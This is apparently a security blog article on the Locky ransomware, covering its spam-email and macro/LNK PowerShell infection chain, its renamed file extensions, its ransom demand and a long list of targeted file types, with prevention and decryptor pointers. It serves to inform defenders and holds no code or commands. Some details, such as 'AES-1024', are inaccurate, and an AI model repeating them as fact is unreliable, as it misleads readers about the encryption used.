Since February, Locky has been chaining its extensions in a bid to deceive victims that they have been infected by a different Ransomware. Locky started originally renaming the encrypted files to .locky and by the time summer arrived it evolved into the .zepto extension, which has been used in multiple campaigns since.
Locky ransomware mainly spreads via spam emails campaigns run by the attackers. These spam emails have mostly .doc files as attachments that contain scrambled text appearing to be macros.
A typical email used in Locky ransomware distribution may be of an invoice that catches most user’s attention, For instance,
Once the user enables macro settings in the Word program, an executable file which is actually the ransomware is downloaded on the PC. Thereafter, various files on the victim’s PC are encrypted by the ransomware giving them unique 16 letter – digit combination names with .shit, .thor, .locky, .zepto or .odin file extensions. All files are encrypted using the RSA-2048 and AES-1024 algorithms and require a private key stored on the remote servers controlled by the cyber criminals for decryption.
It further states that files can only be decrypted using a decrypter developed by cyber criminals and costing .5 BitCoin. Hence, to get the files back, the victim is asked to install the Tor browser and follow a link provided in the text files/wallpaper. The website contains instructions to make the payment.
There is no guarantee that even after making the payment victim files will be decrypted. But usually to protect its ‘reputation’ ransomware authors usually stick to their part of the bargain.
Post its evolution this year in February; Locky ransomware infections have gradually decreased with lesser detections of Nemucod, which Locky uses to infect computers. (Nemucod is a .wsf file contained in .zip attachments in spam email). However, as Microsoft reports, Locky authors have changed the attachment from .wsf files to shortcut files (.LNK extension) that contain PowerShell commands to download and run Locky.
An example of the spam email below shows that it is made to attract immediate attention from the users. It is sent with high importance and with random characters in the subject line. The body of the email is empty.
The spam email typically names as Bill arrives with a .zip attachment, which contains the .LNK files. In opening the .zip attachment, users trigger the infection chain. This threat is detected as TrojanDownloader:PowerShell/Ploprolo.A. When the PowerShell script successfully runs, it downloads and executes Locky in a temporary folder completing the infection chain.
.yuv, .ycbcra, .xis, .wpd, .tex, .sxg, .stx, .srw, .srf, .sqlitedb, .sqlite3, .sqlite, .sdf, .sda, .s3db, .rwz, .rwl, .rdb, .rat, .raf, .qby, .qbx, .qbw, .qbr, .qba, .psafe3, .plc, .plus_muhd, .pdd, .oth, .orf, .odm, .odf, .nyf, .nxl, .nwb, .nrw, .nop, .nef, .ndd, .myd, .mrw, .moneywell, .mny, .mmw, .mfw, .mef, .mdc, .lua, .kpdx, .kdc, .kdbx, .jpe, .incpas, .iiq, .ibz, .ibank, .hbk, .gry, .grey, .gray, .fhd, .ffd, .exf, .erf, .erbsql, .eml, .dxg, .drf, .dng, .dgc, .des, .der, .ddrw, .ddoc, .dcs, .db_journal, .csl, .csh, .crw, .craw, .cib, .cdrw, .cdr6, .cdr5, .cdr4, .cdr3, .bpw, .bgt, .bdb, .bay, .bank, .backupdb, .backup, .back, .awg, .apj, .ait, .agdl, .ads, .adb, .acr, .ach, .accdt, .accdr, .accde, .vmxf, .vmsd, .vhdx, .vhd, .vbox, .stm, .rvt, .qcow, .qed, .pif, .pdb, .pab, .ost, .ogg, .nvram, .ndf, .m2ts, .log, .hpp, .hdd, .groups, .flvv, .edb, .dit, .dat, .cmt, .bin, .aiff, .xlk, .wad, .tlg, .say, .sas7bdat, .qbm, .qbb, .ptx, .pfx, .pef, .pat, .oil, .odc, .nsh, .nsg, .nsf, .nsd, .mos, .indd, .iif, .fpx, .fff, .fdb, .dtd, .design, .ddd, .dcr, .dac, .cdx, .cdf, .blend, .bkp, .adp, .act, .xlr, .xlam, .xla, .wps, .tga, .pspimage, .pct, .pcd, .fxg, .flac, .eps, .dxb, .drw, .dot, .cpi, .cls, .cdr, .arw, .aac, .thm, .srt, .save, .safe, .pwm, .pages, .obj, .mlb, .mbx, .lit, .laccdb, .kwm, .idx, .html, .flf, .dxf, .dwg, .dds, .csv, .css, .config, .cfg, .cer, .asx, .aspx, .aoi, .accdb, .7zip, .xls, .wab, .rtf, .prf, .ppt, .oab, .msg, .mapimail, .jnt, .doc, .dbx, .contact, .mid, .wma, .flv, .mkv, .mov, .avi, .asf, .mpeg, .vob, .mpg, .wmv, .fla, .swf, .wav, .qcow2, .vdi, .vmdk, .vmx, .wallet, .upk, .sav, .ltx, .litesql, .litemod, .lbf, .iwi, .forge, .das, .d3dbsp, .bsa, .bik, .asset, .apk, .gpg, .aes, .ARC, .PAQ, .tar.bz2, .tbk, .bak, .tar, .tgz, .rar, .zip, .djv, .djvu, .svg, .bmp, .png, .gif, .raw, .cgm, .jpeg, .jpg, .tif, .tiff, .NEF, .psd, .cmd, .bat, .class, .jar, .java, .asp, .brd, .sch, .dch, .dip, .vbs, .asm, .pas, .cpp, .php, .ldf, .mdf, .ibd, .MYI, .MYD, .frm, .odb, .dbf, .mdb, .sql, .SQLITEDB, .SQLITE3, .pst, .onetoc2, .asc, .lay6, .lay, .ms11 (Security copy), .sldm, .sldx, .ppsm, .ppsx, .ppam, .docb, .mml, .sxm, .otg, .odg, .uop, .potx, .potm, .pptx, .pptm, .std, .sxd, .pot, .pps, .sti, .sxi, .otp, .odp, .wks, .xltx, .xltm, .xlsx, .xlsm, .xlsb, .slk, .xlw, .xlt, .xlm, .xlc, .dif, .stc, .sxc, .ots, .ods, .hwp, .dotm, .dotx, .docm, .docx, .DOT, .max, .xml, .txt, .CSV, .uot, .RTF, .pdf, .XLS, .PPT, .stw, .sxw, .ott, .odt, .DOC, .pem, .csr, .crt, .ke.
Locky is a dangerous virus that possesses a grave threat to your PC. It’s recommended that you follow these instructions to prevent ransomware and avoid getting infected.
As of now, there are no decrypters available for Locky ransomware. However, a Decryptor from Emsisoft can be used to decrypt files encrypted by AutoLocky, another ransomware that also renames files to the .locky extension. AutoLocky uses scripting language AutoI and tries to mimic the complex and sophisticated Locky ransomware. You can see the complete list of available ransomware decryptor tools here.